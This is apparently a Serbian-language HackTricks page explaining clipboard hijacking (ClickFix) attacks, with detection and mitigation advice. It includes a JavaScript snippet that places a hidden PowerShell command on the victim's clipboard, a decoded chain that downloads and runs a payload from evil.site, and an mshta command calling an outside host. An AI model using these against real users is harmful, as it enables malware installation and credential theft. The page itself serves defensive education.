Clipboard Hijacking (Pastejacking) Attacks
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
"Nikada ne lepite ništa što niste sami kopirali." – stara, ali još uvek važeća preporuka
Overview
Clipboard hijacking – takođe poznat kao pastejacking – zloupotrebljava činjenicu da korisnici rutinski kopiraju i lepe komande bez da ih pregledaju. Zlonamerna veb stranica (ili bilo koji kontekst sposoban za JavaScript, kao što su Electron ili Desktop aplikacije) programatski postavlja tekst pod kontrolom napadača u sistemski clipboard. Žrtve su podstaknute, obično pažljivo osmišljenim uputstvima za socijalno inženjerstvo, da pritisnu Win + R (Run dijalog), Win + X (Brzi pristup / PowerShell), ili da otvore terminal i lepe sadržaj clipboard-a, odmah izvršavajući proizvoljne komande.
Zato što nema preuzimanja datoteka i nema otvaranja priloga, tehnika zaobilazi većinu e-mail i web-sadržajnih bezbednosnih kontrola koje prate priloge, makroe ili direktno izvršavanje komandi. Napad je stoga popularan u phishing kampanjama koje isporučuju komercijalne porodice malvera kao što su NetSupport RAT, Latrodectus loader ili Lumma Stealer.
JavaScript Proof-of-Concept
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
navigator.clipboard.writeText(payload)
.then(() => alert('Now press Win+R , paste and hit Enter to fix the problem.'));
}
</script>
Starije kampanje su koristile document.execCommand('copy')
, dok se novije oslanjaju na asinhroni Clipboard API (navigator.clipboard.writeText
).
ClickFix / ClearFake Tok
- Korisnik posećuje sajt sa greškom u imenu ili kompromitovan sajt (npr.
docusign.sa[.]com
) - Umetnuti ClearFake JavaScript poziva
unsecuredCopyToClipboard()
pomoćnu funkciju koja tiho čuva Base64-enkodiranu PowerShell jedinstvenu komandu u clipboard-u. - HTML uputstva govore žrtvi da: “Pritisnite Win + R, nalepite komandu i pritisnite Enter da biste rešili problem.”
powershell.exe
se izvršava, preuzimajući arhivu koja sadrži legitimnu izvršnu datoteku plus zloćudni DLL (klasično DLL sideloading).- Loader dekriptuje dodatne faze, umetne shellcode i instalira postojanost (npr. zakazani zadatak) – na kraju pokreće NetSupport RAT / Latrodectus / Lumma Stealer.
Primer NetSupport RAT Lanca
powershell -nop -w hidden -enc <Base64>
# ↓ Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll
jp2launcher.exe
(legitimni Java WebStart) pretražuje svoj direktorijum zamsvcp140.dll
.- Maliciozni DLL dinamički rešava API-je sa GetProcAddress, preuzima dva binarna fajla (
data_3.bin
,data_4.bin
) putem curl.exe, dekriptuje ih koristeći rolling XOR ključ"https://google.com/"
, injektuje konačni shellcode i raspakuje client32.exe (NetSupport RAT) uC:\ProgramData\SecurityCheck_v1\
.
Latrodectus Loader
powershell -nop -enc <Base64> # Cloud Identificator: 2031
- Preuzima
la.txt
pomoću curl.exe - Izvršava JScript downloader unutar cscript.exe
- Preuzima MSI payload → postavlja
libcef.dll
pored potpisane aplikacije → DLL sideloading → shellcode → Latrodectus.
Lumma Stealer putem MSHTA
mshta https://iplogger.co/xxxx =+\\xxx
mshta poziv pokreće skriveni PowerShell skript koji preuzima PartyContinued.exe
, ekstrahuje Boat.pst
(CAB), rekonstruiše AutoIt3.exe
putem extrac32
i spajanja fajlova, i na kraju pokreće .a3x
skript koji exfiltrira kredencijale pretraživača na sumeriavgv.digital
.
Detekcija i Lov
Plave ekipe mogu kombinovati telemetriju clipboard-a, kreiranja procesa i registra kako bi precizno odredile zloupotrebu pastejacking-a:
- Windows Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
čuva istoriju Win + R komandi – tražite neobične Base64 / obfuskovane unose. - ID sigurnosnog događaja 4688 (Kreiranje procesa) gde je
ParentImage
==explorer.exe
iNewProcessName
u {powershell.exe
,wscript.exe
,mshta.exe
,curl.exe
,cmd.exe
}. - Događaj ID 4663 za kreiranje fajlova pod
%LocalAppData%\Microsoft\Windows\WinX\
ili privremenim folderima neposredno pre sumnjivog 4688 događaja. - EDR senzori clipboard-a (ako su prisutni) – korelacija
Clipboard Write
odmah nakon novog PowerShell procesa.
Mogućnosti ublažavanja
- Ojačavanje pretraživača – onemogućiti pristup pisanju u clipboard (
dom.events.asyncClipboard.clipboardItem
itd.) ili zahtevati korisnički gest. - Bezbednosna svest – podučiti korisnike da kucaju osetljive komande ili ih prvo nalepite u tekst editor.
- PowerShell Constrained Language Mode / Execution Policy + Kontrola aplikacija za blokiranje proizvoljnih jedne-linijskih komandi.
- Mrežne kontrole – blokirati odlazne zahteve ka poznatim pastejacking i malware C2 domenima.
Povezani trikovi
- Discord Invite Hijacking često zloupotrebljava isti ClickFix pristup nakon što namami korisnike u zloćudni server: {{#ref}} discord-invite-hijacking.md {{#endref}}
Reference
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.